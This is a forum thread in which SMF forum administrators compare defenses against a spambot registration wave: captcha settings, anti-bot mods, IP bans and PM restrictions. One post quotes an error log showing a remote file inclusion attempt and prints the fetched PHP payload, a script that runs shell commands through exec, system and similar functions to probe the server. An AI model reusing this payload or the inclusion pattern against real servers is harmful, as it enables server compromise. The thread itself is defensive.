Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum

[MadMax201]

Hi there,

i dont know if it was already mentioned :
my workaround to stop those spam-bots is to apend a suffix like "_dummy" to the user / email field on the Register.template.php form.
you have also to modify the document.forms.creator.regSubmit.disabled line and the Register.php around line 292

With this my smf 1.1.7 is spam-free for now.


regards Mike

[ModelBoatMayhem]

If you have been considering upgrading to 2.0, now might be a good time to do so.

1.Thanks for all your help and advice Deprecated, much appreciated.
Are you recommending we install SMF 2.0 Beta 4 Public before the final on our live sites?

2. Also do any of the security mods work on all themes?

Martin - England (SMF 1.1.7 - attacks a day currently.)

[Paul Cull]

Just an observation: I have been banning the IPs of the bots, and notice that, although I haven't had any new signups since I upped the captcha level and added age verification, I am still getting visited from a few of these IP addresses.

All of these got my "you have been banned" message this morning, which make me think that there is a limited number of IP ranges from which these attacks are orginating, and that for some strange reason, the bot reguarly comes back to my forum to try its luck again.

08:11:01 IP 84.19.176.2
08:10:59 IP 84.19.176.2      
08:10:52 IP 194.165.42.109      
08:10:51 IP 194.165.42.109      
06:50:22 IP 194.165.42.67      
06:50:21 IP 194.165.42.67      
06:31:09 IP 194.165.42.91      
06:31:08 IP 194.165.42.91      
05:27:37 IP 88.119.247.27      
05:27:19 IP 88.119.247.27      
03:33:04 IP 194.165.42.27      
03:32:42 IP 194.165.42.27      
01:35:58 IP 194.8.75.214      
01:35:55 IP 194.8.75.214      

Weird stuff eh

Paul

[bigmo66]

It's been about 24 hours and at least 100 tries have been made to register bogus accounts to my forum and not one has got past the increased Captcha & age verification.  Will they "learn" or is this possibly good enough?

[Deprecated]

mprayii- Just try them and see. Install one, test it yourself. If you like it, keep it. If not, uninstall it and install a different one.

That's the first report that the "Are You Human?" mod failed. First I've seen anyway.

[Deprecated]

If you have been considering upgrading to 2.0, now might be a good time to do so.

1.Thanks for all your help and advice Deprecated, much appreciated.
Are you recommending we install SMF 2.0 Beta 4 Public before the final on our live sites?

2. Also do any of the security mods work on all themes?

Martin - England (SMF 1.1.7 - attacks a day currently.)

Whether to install 2.0 is a difficult decision for most. Fewer themes are available, and in some cases your mods may not be available in 2.0 versions. TinyPortal isn't compatible yet, although Simple Portal is a good alternative and is 2.0 compatible.

I have all my own sites on 2.0 Beta 4, but I don't think it's time for everybody to switch up, even though I wish they would just because it would be easier if we didn't have to support 1.x. There are several 2.0 features well worth the upgrade, not the least of which is improved security and anti-bot protection. The PM system is much, much, much improved! (I really like it.) Mod writers like 2.0 because in some cases it's easier and cleaner to write mods for 2.0. Finally, there are some appearance issues and at least one bug that needs fixing, although the solution is easy and well known (totalMembers bug).

It's up to each person to decide if or when to upgrade to 2.0. There is no guarantee that the spambot attacks won't spread to 2.0, although we are well prepared, including the three mods in the OP.

[Deprecated]

It's been about 24 hours and at least 100 tries have been made to register bogus accounts to my forum and not one has got past the increased Captcha & age verification.  Will they "learn" or is this possibly good enough?

Bots don't learn, but their botmasters might decide to reprogram them.

[ethankcvds]

Well I'm not taking any chances I'm adding questions and the reCAPTCHA mod to my SMF 2.0  beta 4. I'm also running SMF 1.1.7 but its an  invite only site so I would like to see them register to that site.

[zigzag]

That's the first report that the "Are You Human?" mod failed. First I've seen anyway.

I've only had one pass through the Are you human mod but the ip was from Lagos and I think that the registration might have been processed by a human rather than bot.

All the other ip's that made it through before I installed the mod were from Saudi, Ukraine and Germany and the same bots are still trying to sign up but so far none have got past.

As well as the mod I have the SMF capture set too medium.

[Muldoon]

Well stepping up the visual verification image from medium to high has stopped the bots in their tracks for my site...not one registration from them after implementing this step!    Thank you for the guidance.

[Pere Escobar Solsona]

For opened forums (where guests can post messages) I tried the Advanced Visual Verification MOD and, when installed, it works fine (no more spam messages); the installation fails on my 1.1.7 forum, but the solution isn't so difficult...

[Burke ♞ Knight]

I just had a strange error pop up, which may or may not be related:

Guest
Today at 10:48:15 AM
IP address 195.12.53.176
Type of error: User
Error 404 - Not Found (http://www.bksmf.com//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.geocities.com/dianavirsana/test.txt???)

I was able to check out that test.txt file, and I cannot figure out what this person is up to.

Code Select Expand

<html><head><title>/\/\/\ Response CMD /\/\/\</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}else{
echo("Safe Mode of this Server is : ");
echo("SafemodeON");
}
}
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
exit;

[Deprecated]

Get a good anti-virus anti-trojan program too. You'll need it.

[Burke ♞ Knight]

Get a good anti-virus anti-trojan program too. You'll need it.

I have one, but the snoop only seems to be scanning sites, looking for installation setup.
However, the Apache Error mod sent him to a 404 not found error...

[wagtail]

They are spamming my cms and smf forum in equal measure.
So this definitely isn't smf specific.

stopforumspam_dot_com is also listing a lot of spammers over the last few days.

At the moment I am resorting to banning the IP ranges from my sites.
My error pages are full with failed attempts (as well as a few still getting through).

Most IPs appear to be from Eastern European servers.

[lax.slash]

Has anyone had users report SPAM through PM systems?

And isn't there some website that you can hook up your forum to, and they somehow check to see if the user is a bot? Can't remember the site.

[forumite]

Had a spammer hit PMs a couple of years ago, and everyone who had notifications turned on also received the spam in their mailbox. Subsequently implemented some restrictions on PMs ad haven't seen it happen since. A number of forums were hit by the same user name.

[Muldoon]

Had a spammer hit PMs a couple of years ago, and everyone who had notifications turned on also received the spam in their mailbox. Subsequently implemented some restrictions on PMs ad haven't seen it happen since. A number of forums were hit by the same user name.

I wonder if it was the same spammer that hit me as well, that was a little over two years ago for me, haha.  Up'd my PM capabilities ...required 50 posts first before a member can PM.

[forumite]

His user name in a number of forums was Robert Thompson (or Thomson). I'm still gun shy from the after effects of that one, and still only manually turn on PMs for folks I've observed to be good forum citizens, or folks I know personally. Also added other PM constraints like minimum number of posts, maximum number of PMs from the same IP in a given time, use of CAPTCHA, etc. Call me paranoid, but I still have the wounds from the complaints and having to explain the whole thing individually to several thousand unhappy campers.

I was online at the time, saw him register, come into the forum, then send PMs. Thought it was strange, then received a PM from another member with a heads up and a copy of his message. But the damage was done before I could react.

[Bill.Ramby]

Had a spammer hit PMs a couple of years ago, and everyone who had notifications turned on also received the spam in their mailbox. Subsequently implemented some restrictions on PMs ad haven't seen it happen since. A number of forums were hit by the same user name.

I wonder if it was the same spammer that hit me as well, that was a little over two years ago for me, haha.  Up'd my PM capabilities ...required 50 posts first before a member can PM.

Same here. Hhmmm.

I went into the database and deleted all those PM's then I had to do a recount on my forum.